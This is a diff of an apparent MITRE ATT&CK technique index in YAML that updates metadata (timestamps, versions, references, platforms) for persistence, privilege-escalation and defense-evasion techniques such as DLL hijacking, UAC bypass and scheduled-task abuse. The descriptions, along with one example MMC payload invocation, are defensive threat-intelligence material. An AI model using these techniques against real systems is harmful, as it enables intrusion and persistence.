         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15028,7 +15299,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -15071,7 +15341,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15095,8 +15365,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15144,7 +15412,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15182,8 +15450,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15232,7 +15498,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15284,29 +15550,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15353,7 +15618,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15385,8 +15650,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15400,6 +15665,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15412,11 +15681,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15482,7 +15754,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15571,7 +15842,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15659,7 +15929,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15744,7 +16013,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15776,7 +16044,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15799,11 +16067,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15861,14 +16128,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15969,7 +16235,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -16000,7 +16265,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16034,13 +16299,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16059,7 +16322,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16073,7 +16335,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16100,8 +16361,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16132,12 +16393,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16209,9 +16471,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16227,12 +16489,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16307,12 +16568,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16332,9 +16592,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16354,9 +16619,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16373,6 +16637,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16406,7 +16674,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16562,31 +16829,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16603,6 +16850,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16613,9 +16861,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16623,13 +16875,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16659,6 +16927,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16669,6 +16938,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16677,13 +16947,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16725,9 +16995,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16795,19 +17062,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16823,8 +17089,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16838,7 +17104,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16864,6 +17130,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16891,12 +17161,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16922,7 +17191,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16964,7 +17233,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -17042,11 +17310,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
